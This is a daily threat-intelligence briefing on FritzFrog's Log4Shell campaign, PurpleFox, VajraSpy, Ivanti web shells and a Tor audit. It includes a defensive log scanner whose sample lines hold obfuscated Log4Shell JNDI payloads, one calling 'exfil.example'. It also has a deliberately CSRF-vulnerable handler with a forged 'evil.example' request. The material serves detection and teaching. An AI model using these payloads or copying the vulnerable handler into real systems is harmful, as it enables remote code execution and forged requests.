
Cyware Daily Threat Intelligence


Daily Threat Briefing Feb 2, 2024

The FritzFrog botnet keeps showing how adaptable it is. In a campaign dubbed Frog4Shell, the malware was observed exploiting Log4Shell, and rather than limiting itself to internet-facing apps it now targets internal network hosts running unpatched Java applications. PurpleFox is also testing its techniques in the wild: Ukraine's CERT warns that its latest campaign has infected over 2,000 computers in the country.

Security researchers took the wraps off a new Android RAT named VajraSpy. It masqueraded as messaging or news applications to steal personal data and record victims' phone calls. In addition, a code security audit of the Tor anonymity network turned up 17 vulnerabilities.

Top Breaches Reported in the Last 24 Hours

Data leak exposes millions of Indian travelers

Sensitive details, including passport numbers, mobile numbers, and email addresses of approximately 3.5 million Indian travelers, were exposed in a data leak. The incident stems from a mandatory COVID-19 e-pass application process introduced during the pandemic. The data, dating from the peak of the pandemic, was found in a publicly accessible S3 bucket, possibly belonging to a third-party service provider.

Telecom giant targeted

An unidentified hacker claims to have gained unauthorized access to Telefónica, one of the world's largest telecommunications companies. The intrusion reportedly went through a Fortinet system that is a key component of the firm's network infrastructure. The extent of the breach and what data was compromised remain undisclosed. Telefónica faced a similar incident in November 2022, after which it urged customers to change their Wi-Fi passwords.

Albanian statistics institute faces cyberattack

Albania's Institute of Statistics (INSTAT) reported a cyberattack, describing it as a "sophisticated" incident. The attack prompted the institute to cut its internet links and activate emergency protocols to protect data. INSTAT stated that while some systems were affected, those related to a recent census were not. The attackers' motives are not yet clear.

Cloudflare's internal systems breached

Cloudflare disclosed a cybersecurity incident where its internal Atlassian server was breached by a suspected "nation state attacker." The intruder gained access to Cloudflare's Confluence wiki, Jira bug database, and Bitbucket source code management system. The attacker utilized access tokens and service account credentials stolen during a previous compromise linked to Okta's October 2023 breach.

Top Malware Reported in the Last 24 Hours

FritzFrog shifts tactics

The FritzFrog botnet, known for brute-forcing SSH credentials and deploying cryptominers, has evolved to exploit the Log4Shell vulnerability in a campaign named Frog4Shell. According to researchers at Akamai, unlike earlier attacks that targeted internet-facing assets, FritzFrog now aims to compromise internal hosts within a victim's network, capitalizing on systems that were never patched because they were not reachable from the internet. The malware has also gained new capabilities, including privilege escalation and defense-evasion tooling.
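For defenders, the practical point of Frog4Shell is that Log4Shell exploit strings now have to be looked for in the logs of internal Java applications, not only at the perimeter. The script below is an added example written for this briefing (not Akamai's code, and not anything from FritzFrog itself): it flags `${jndi:...}` lookups in access-log lines after undoing the URL-encoding and nested-lookup tricks (`${lower:j}`, `${::-j}`) attackers use to slip past naive string matches. The log lines are constructed for the example, and the regexes are an assumed approximation rather than a complete signature.

```python
import re
import urllib.parse

# Lookups Log4j resolves before the JNDI lookup runs, used to hide the word "jndi":
#   ${lower:j} / ${upper:J}  -> j        ${::-j} / ${env:NOPE:-j} -> j
NESTED_CASE = re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.IGNORECASE)
NESTED_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# The lookup itself, capturing the URI scheme the payload points at (ldap, rmi, dns, ...).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

# Constructed sample access-log lines; not taken from Akamai's report or any real host.
SAMPLE_LOGS = [
    '10.0.0.5 - - [02/Feb/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [02/Feb/2024:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://10.0.0.9:1389/a}"',
    '10.0.0.9 - - [02/Feb/2024:10:01:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:r}mi://10.0.0.9:1099/x}"',
    '10.0.0.9 - - [02/Feb/2024:10:01:07 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexfil.example%2Fa%7D HTTP/1.1" 404 0 "-" "curl/8.0"',
    '10.0.0.9 - - [02/Feb/2024:10:01:08 +0000] "GET /${${::-j}${::-n}${::-d}${::-i}:ldap://10.0.0.9:1389/b} HTTP/1.1" 404 0 "-" "curl/8.0"',
    '10.0.0.12 - - [02/Feb/2024:10:01:09 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 10 "-" "x"',
]


def normalize(text, max_rounds=6):
    """Undo URL-encoding and nested-lookup obfuscation until the text stops changing,
    then lowercase it so the caller's pattern match is case-insensitive."""
    for _ in range(max_rounds):
        before = text
        text = urllib.parse.unquote(text)
        text = NESTED_CASE.sub(lambda m: m.group(1), text)
        text = NESTED_DEFAULT.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text.lower()


def scan_log_lines(lines):
    """Return one hit (1-based line number, JNDI scheme, raw line) per line
    that contains a JNDI lookup after normalization."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        match = JNDI_LOOKUP.search(normalize(line))
        if match:
            hits.append({"line": lineno, "scheme": match.group(1), "raw": line})
    return hits


if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOGS):
        print(f"line {hit['line']}: jndi lookup, scheme={hit['scheme']}")
```

A hit means an exploit attempt reached the application, not that it succeeded; correlate with outbound LDAP, RMI or DNS connections from the same host. Exploit strings can arrive in any logged field (User-Agent, arbitrary headers, form data), so run this over whatever the application actually writes to its logs, and expect legitimate `${date:...}`-style lookups, which the scheme-anchored pattern deliberately ignores.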

PurpleFox malware hits Ukraine

CERT-UA issued a warning about a PurpleFox malware campaign that has infected at least 2,000 computers in the country. The modular Windows botnet malware can act as a downloader for more potent payloads, provide backdoor capabilities, and operate as a DDoS bot. By tracking infected hosts, analysts identified 486 intermediate control-server IP addresses, most of them located in China.

Android RAT found in a dozen Android apps

ESET discovered the VajraSpy Android RAT in 12 malicious applications, six of which were available on Google Play between April 1, 2021, and September 10, 2023. Disguised as messaging or news apps, the malware could steal personal data, including contacts and messages, and record phone calls. ESET tentatively attributes the campaign to the Patchwork APT group.

APT group drops BUSHWALK against Ivanti

China-linked APT group UNC5221 is reportedly exploiting vulnerabilities in Ivanti Connect Secure VPN and Policy Secure devices with new malware. Mandiant researchers observed the attackers using the BUSHWALK web shell, a new LIGHTWIRE variant, and the Python web shell CHAINLINE. Post-exploitation activity included a technique that bypasses Ivanti's initial mitigation, which was observed being used to deploy BUSHWALK.

Top Vulnerabilities Reported in the Last 24 Hours

Multiple security bugs found in Tor

A comprehensive security audit of the Tor anonymity network by Radically Open Security found 17 vulnerabilities, including a high-risk cross-site request forgery (CSRF) bug in the Onion Bandwidth Scanner (Onbasca). The CSRF flaw could let an unauthenticated attacker inject bridges into the database, potentially enabling further attacks. Most of the remaining issues are rated medium or low risk; the Onbasca CSRF flaw is considered the most significant.
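The Onbasca bug is a reminder of what CSRF buys an attacker: the attacker is not logged in, but a page they control can make a logged-in operator's browser submit a request, and the browser attaches the session cookie automatically. The following is an added example written for this briefing, not Onbasca's or Tor's own code: a minimal bridge-submission handler that trusts the session cookie alone, beside a hardened version that also requires a per-session synchronizer token and an allow-listed Origin/Referer. The session store, the bridge list, the origin `https://onbasca.example` and the request dictionaries are all constructed for the example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed stand-ins for a cookie-session store and the bridge table (not Onbasca's code).
SESSIONS = {
    "sess-alice": {"user": "alice", "csrf_token": secrets.token_hex(16)},
}
ALLOWED_ORIGIN = "https://onbasca.example"  # assumed deployment origin


def add_bridge_vulnerable(req, bridges):
    """Trusts the session cookie alone. A page on any other origin can make the
    victim's browser POST here, and the browser sends the cookie with it."""
    sess = SESSIONS.get(req["cookies"].get("session"))
    if sess is None:
        return 401
    bridges.append(req["form"]["bridge_line"])
    return 201


def request_origin(req):
    """Scheme and host the browser says the request came from (Origin, else Referer)."""
    src = req["headers"].get("Origin") or req["headers"].get("Referer")
    if not src:
        return None
    parts = urlsplit(src)
    return f"{parts.scheme}://{parts.netloc}"


def add_bridge_hardened(req, bridges):
    """Same endpoint with two independent CSRF checks: an Origin/Referer allow-list,
    and a per-session synchronizer token that a cross-site page cannot read."""
    sess = SESSIONS.get(req["cookies"].get("session"))
    if sess is None:
        return 401
    if request_origin(req) != ALLOWED_ORIGIN:
        return 403
    submitted = req["form"].get("csrf_token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(submitted, sess["csrf_token"]):
        return 403
    bridges.append(req["form"]["bridge_line"])
    return 201


# Constructed requests. CROSS_SITE is what the victim's browser sends after being
# lured to evil.example: Alice's cookie is attached, but there is no token and the
# Origin is foreign. LEGIT is a submission from the real Onbasca UI.
CROSS_SITE = {
    "cookies": {"session": "sess-alice"},
    "headers": {"Origin": "https://evil.example"},
    "form": {"bridge_line": "obfs4 198.51.100.7:443"},  # attacker-chosen bridge
}
LEGIT = {
    "cookies": {"session": "sess-alice"},
    "headers": {"Origin": ALLOWED_ORIGIN},
    "form": {
        "bridge_line": "obfs4 203.0.113.9:443",
        "csrf_token": SESSIONS["sess-alice"]["csrf_token"],
    },
}

if __name__ == "__main__":
    table = []
    print("vulnerable, cross-site:", add_bridge_vulnerable(CROSS_SITE, table), table)
    table = []
    print("hardened, cross-site:  ", add_bridge_hardened(CROSS_SITE, table), table)
    print("hardened, legitimate:  ", add_bridge_hardened(LEGIT, table), table)
```

Both checks are worth keeping: the token is the real defense, since a cross-site page cannot read it, while the Origin check cheaply rejects most forged requests before any work is done. Setting `SameSite=Lax` or `Strict` on the session cookie adds a further layer that stops the browser from attaching it to cross-site POSTs at all, but it depends on client behaviour and should not replace the token.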
